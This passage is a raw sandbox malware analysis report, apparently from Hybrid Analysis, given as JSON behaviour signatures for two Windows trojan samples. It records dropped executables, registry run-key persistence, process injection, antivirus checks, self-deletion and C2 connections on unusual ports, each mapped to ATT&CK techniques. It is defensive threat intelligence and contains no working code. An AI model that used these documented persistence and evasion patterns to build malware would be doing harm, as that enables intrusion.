"Cryptographic Related", "identifier": "binary-71", "type": 8, "relevance": 1, "name": "Sample file has high entropy (likely encrypted/compressed content)", "description": "Sample file \"sample.bin\" has high entropy 7.654943589278852", "origin": "Binary File", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\FILEINFO\\INSTANCES\\FILEINFO\"; Key: \"FLAGS\"; Value: \"\")\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\FILEINFO\\INSTANCES\\FILEINFO\"; Key: \"ALTITUDE\"; Value: \"\")\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LUAFV\\INSTANCES\\LUAFV\"; Key: \"FLAGS\"; Value: \"\")\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LUAFV\\INSTANCES\\LUAFV\"; Key: \"ALTITUDE\"; Value: \"\")\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"LDAPCLIENTINTEGRITY\"; Value: \"\")\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEOLDHOSTRESOLUTIONORDER\"; Value: \"\")\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEHOSTNAMEASALIAS\"; Value: \"\")\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"IPV4LOOPBACKALTERNATIVE\"; Value: \"\")\n \"biudfw.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"WINSOCK_REGISTRY_VERSION\"; Value: \"\")\n \"biudfw.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"NAMESPACE_CALLOUT\"; Value: \"\")\n \"biudfw.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"SERIAL_ACCESS_NUM\"; Value: \"\")\n \"biudfw.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NEXT_CATALOG_ENTRY_ID\"; Value: \"\")\n \"biudfw.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NUM_CATALOG_ENTRIES\"; Value: \"\")\n \"biudfw.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000001\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"biudfw.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000002\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"biudfw.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000003\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"biudfw.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000004\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"biudfw.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000005\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" opened \"\\Device\\KsecDD\"\n \"biudfw.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-67", "type": 3, "relevance": 10, "name": "Creates or modifies windows services", "description": "\"biudfw.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\")", "origin": "Registry Access", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level_human": "informative", "category": "System Destruction", "identifier": "api-26", "type": 6, "relevance": 10, "name": "Marks file for deletion", "description": "\"cmd.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\sanfdr.bat\" for deletion", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "api-6", "type": 6, "relevance": 4, "name": "Reads configuration files (.ini files)", "description": "\"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" reads file \"C:\\Users\\%OSUSER%\\Desktop\\desktop.ini\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" reads file \"C:\\Users\\%OSUSER%\\Searches\\desktop.ini\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" reads file \"C:\\Users\\%OSUSER%\\Videos\\desktop.ini\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" reads file \"C:\\Users\\%OSUSER%\\Pictures\\desktop.ini\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" reads file \"C:\\Users\\%OSUSER%\\Contacts\\desktop.ini\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" reads file \"C:\\Users\\%OSUSER%\\Favorites\\desktop.ini\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" reads file \"C:\\Users\\%OSUSER%\\Music\\desktop.ini\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" reads file \"C:\\Users\\%OSUSER%\\Downloads\\desktop.ini\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"biudfw.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows PECompact2 compressed\"- Location: [%TEMP%\\biudfw.exe]- [targetUID: 00000000-00005876]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" wrote 53248 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\biudfw.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Detection/Stealthyness", "identifier": "registry-113", "type": 3, "relevance": 7, "name": "Tries to save executable or command in registry", "description": "\"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"RUN\"; Value: \"%TEMP%\\biudfw.exe\")", "origin": "Registry Access", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d\" has section name .text with entropy \"7.99475023079\"\n \"biudfw.exe\" has section name .text with entropy \"7.99475023079\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Environment Awareness", "identifier": "api-127", "type": 6, "relevance": 3, "name": "Tries to check installed antivirus", "description": "\"biudfw.exe\" trying to access \"C:\\Program Files\\AhnLab\\V3Lite30\\V3Lite.exe\"\n \"biudfw.exe\" trying to access \"C:\\Program Files\\AHNLAB\\V3LITE30\\V3LITE.EXE\"", "origin": "API Call", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "target-423", "type": 9, "relevance": 5, "name": "Tries to access/write temporary files", "description": "Process \"%WINDIR%\\system32\\cmd.exe\" with commandline \"/c \"\"%TEMP%\\\\sanfdr.bat\" \"\" (UID: 00000000-00003956)", "origin": "Monitored Target", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "target-413", "type": 9, "relevance": 3, "name": "Spawned processes likely due to injection", "description": "Process \"%TEMP%\\biudfw.exe\" spawned likely due to injection", "origin": "Monitored Target", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "target-412", "type": 9, "relevance": 5, "name": "Spawned process connects to a network", "description": "Process \"%TEMP%\\biudfw.exe\" connects to <IPv4> on port 11120 (TCP)\n Process \"%TEMP%\\biudfw.exe\" connects to <IPv4> on port 11150 (TCP)\n Process \"%TEMP%\\biudfw.exe\" connects to <IPv4> on port 11170 (TCP)\n Process \"%TEMP%\\biudfw.exe\" connects to <IPv4> on port 11150 (TCP)", "origin": "Monitored Target", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Cryptographic Related", "identifier": "binary-60", "type": 8, "relevance": 5, "name": "Dropped file has high entropy (likely encrypted/compressed content)", "description": "Dropped file \"%TEMP%\\biudfw.exe\" has high entropy 7.6527055070354635", "origin": "Binary File", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-27", "type": 3, "relevance": 10, "name": "Modifies proxy settings", "description": "\"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\HGDraw.dll\" with delete access\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\HGDRAW.DLL\" with delete access\n \"biudfw.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\HGDraw.dll\" with delete access\n \"biudfw.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\houtue.exe\" with delete access\n \"biudfw.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\HGDRAW.DLL\" with delete access\n \"biudfw.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\HOUTUE.EXE\" with delete access\n \"cmd.exe\" opened \"C:\\ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" with delete access\n \"cmd.exe\" opened \"C:\\ED09BE~1.EXE\" with delete access\n \"cmd.exe\" opened \"C:\\\" with delete access\n \"cmd.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\sanfdr.bat\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "General", "identifier": "api-117", "type": 6, "relevance": 10, "name": "Calls an API typically used to execute an application", "description": "\"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"ShellExecuteW\" with parameter %TEMP%\\biudfw.exe (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"ShellExecuteA\" with parameter %TEMP%\\sanfdr.bat (UID: 00000000-00005876)\n \"biudfw.exe\" called \"ShellExecuteW\" with parameter %TEMP%\\hiofge.exe (UID: 00000000-00006040)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\biudfw.exe\" (Handle: 684)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\biudfw.exe\" (Handle: 684)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\biudfw.exe\" (Handle: 684)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-7", "type": 7, "relevance": 7, "name": "Uses network protocols on unusual ports", "description": "TCP traffic to <IPv4> on port 11120\n TCP traffic to <IPv4> on port 11150\n TCP traffic to <IPv4> on port 11170\n TCP traffic to <IPv4> on port 11150", "origin": "Network Traffic", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
f1963f22ff5e0275ad5e3f5ec43472dd7c05b3d1b65851d64c6f4aaf1d85e436
https://hybrid-analysis.com/sample/f1963f22ff5e0275ad5e3f5ec43472dd7c05b3d1b65851d64c6f4aaf1d85e436
Hybrid Analysis - Killers
{"size": 118784, "type": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "submit_name": "f1963f22ff5e0275ad5e3f5ec43472dd7c05b3d1b65851d64c6f4aaf1d85e436", "sha256": "f1963f22ff5e0275ad5e3f5ec43472dd7c05b3d1b65851d64c6f4aaf1d85e436", "av_detect": 85, "vx_family": "Trojan.Generic", "threat_score": 50, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 1, "total_signatures": 36, "file_metadata": {"file_compositions": ["1 .OBJ Files (COFF) linked with LINK.EXE 9.00 (Visual Studio 2008) (build: 21022)", "1 .C Files compiled with CL.EXE 15.00 (Visual Studio 2008) (build: 21022)", "2 .CPP Files compiled with CL.EXE 15.00 (Visual Studio 2008) (build: 21022)"], "imported_objects": ["7 .LIB Files generated with LIB.EXE 8.00 (Visual Studio 2005) (build: 50727)", "5 .CPP Files compiled with CL.EXE 12.00 (Visual Studio 6) (build: 8168)"], "file_analysis": ["File contains C++ code", "File appears to contain raw COFF/OMF content", "File is the product of a small codebase (3 files)"], "total_file_compositions_imports": 29}, "processes": [{"uid": "00000000-00005512", "name": "f1963f22ff5e0275ad5e3f5ec43472dd7c05b3d1b65851d64c6f4aaf1d85e436.exe", "normalized_path": "C:\\f1963f22ff5e0275ad5e3f5ec43472dd7c05b3d1b65851d64c6f4aaf1d85e436.exe", "sha256": "f1963f22ff5e0275ad5e3f5ec43472dd7c05b3d1b65851d64c6f4aaf1d85e436", "av_label": "Gen:Variant.Tedy", "av_matched": 12, "av_total": 22}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 1, "informative_identifiers_count": 6}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 3, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"f1963f22ff5e0275ad5e3f5ec43472dd7c05b3d1b65851d64c6f4aaf1d85e436\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"f1963f22ff5e0275ad5e3f5ec43472dd7c05b3d1b65851d64c6f4aaf1d85e436\" file has an entrypoint instructions - \"push\tebp,mov\tebp, esp,sub\tesp, 0x44,push\tesi,call\tdword ptr [0x402040],mov\tesi, eax,mov\tal, byte ptr [esi],cmp\tal, 0x22,jne\t0x401c29,mov\tal, byte ptr [esi + 1],inc\tesi,test\tal, al,je\t0x401c21,cmp\tal, 0x22,jne\t0x401c15,cmp\tbyte ptr [esi], 0x22,jne\t0x401c33,inc\tesi,jmp\t0x401c33,cmp\tal, 0x20,jle\t0x401c33,inc\tesi,cmp\tbyte ptr [esi], 0x20,jg\t0x401c2d,mov\tal, byte ptr [esi],test\tal, al,je\t0x401c3d,cmp\tal, 0x20,jle\t0x401c26,and\tdword ptr [ebp - 0x18], 0,lea\teax, [ebp - 0x44],push\teax,call\tdword ptr [0x402004],call\t0x401cad,push\t0x403004,push\t0x403000,call\t0x401c93,test\tbyte ptr [ebp - 0x18], 1,pop\tecx,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"f1963f22ff5e0275ad5e3f5ec43472dd7c05b3d1b65851d64c6f4aaf1d85e436\" was detected as \"UPX\" and name: \"Packer\"\n \"f1963f22ff5e0275ad5e3f5ec43472dd7c05b3d1b65851d64c6f4aaf1d85e436\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"f1963f22ff5e0275ad5e3f5ec43472dd7c05b3d1b65851d64c6f4aaf1d85e436\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"f1963f22ff5e0275ad5e3f5ec43472dd7c05b3d1b65851d64c6f4aaf1d85e436\" has an executable section named \"UPX0\"\n \"f1963f22ff5e0275ad5e3f5ec43472dd7c05b3d1b65851d64c6f4aaf1d85e436\" has an executable section named \"UPX1\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"f1963f22ff5e0275ad5e3f5ec43472dd7c05b3d1b65851d64c6f4aaf1d85e436\" has an writable section named \"UPX0\"\n \"f1963f22ff5e0275ad5e3f5ec43472dd7c05b3d1b65851d64c6f4aaf1d85e436\" has an writable section named \"UPX1\"\n \"f1963f22ff5e0275ad5e3f5ec43472dd7c05b3d1b65851d64c6f4aaf1d85e436\" has an writable section named \"UPX2\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"f1963f22ff5e0275ad5e3f5ec43472dd7c05b3d1b65851d64c6f4aaf1d85e436\" was detected as \"Borland Delphi 3.0 (???)\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"f1963f22ff5e0275ad5e3f5ec43472dd7c05b3d1b65851d64c6f4aaf1d85e436.exe\" reads file \"c:\\f1963f22ff5e0275ad5e3f5ec43472dd7c05b3d1b65851d64c6f4aaf1d85e436.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"f1963f22ff5e0275ad5e3f5ec43472dd7c05b3d1b65851d64c6f4aaf1d85e436.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"f1963f22ff5e0275ad5e3f5ec43472dd7c05b3d1b65851d64c6f4aaf1d85e436.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"f1963f22ff5e0275ad5e3f5ec43472dd7c05b3d1b65851d64c6f4aaf1d85e436.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"f1963f22ff5e0275ad5e3f5ec43472dd7c05b3d1b65851d64c6f4aaf1d85e436.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"f1963f22ff5e0275ad5e3f5ec43472dd7c05b3d1b65851d64c6f4aaf1d85e436.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"f1963f22ff5e0275ad5e3f5ec43472dd7c05b3d1b65851d64c6f4aaf1d85e436.exe\" (Access type: \"OPEN\"; Path: 